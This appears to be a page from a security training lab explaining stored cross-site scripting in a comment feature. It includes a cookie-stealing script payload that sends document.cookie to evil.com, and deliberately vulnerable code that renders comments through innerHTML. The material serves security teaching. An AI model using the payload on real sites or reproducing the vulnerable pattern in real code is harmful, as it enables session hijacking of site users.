Search labs…⌘K
Dashboard/Injection/Stored XSS in Comments

Stored XSS in Comments

Easy
#xss
#owasp-a03
#stored

Overview

This lab demonstrates stored Cross-Site Scripting where malicious JavaScript is persisted in the database and rendered unsanitized to all users viewing the page.

Scenario

The application has a comment feature. Comments are stored in the database and rendered directly into the page HTML without any sanitization or encoding.

Exploit Steps

  1. 01Navigate to the comments section
  2. 02Submit a comment containing: <script>document.location='https://evil.com/steal?c='+document.cookie</script>
  3. 03Observe the script executes when any user views the page
routes/comments.js
// Vulnerable — renders raw HTML
app.get('/api/comments', (req, res) => {
  const comments = db.query('SELECT * FROM comments');
  res.json(comments);
});

// Client-side rendering
function renderComments(comments) {
  // ❌ innerHTML renders scripts
  container.innerHTML = comments
    .map(c => `<div class="comment">${c.body}</div>`)
    .join('');
}

This code contains a known vulnerability. Never deploy code like this in production. Use the Secure Mode toggle to see the remediation.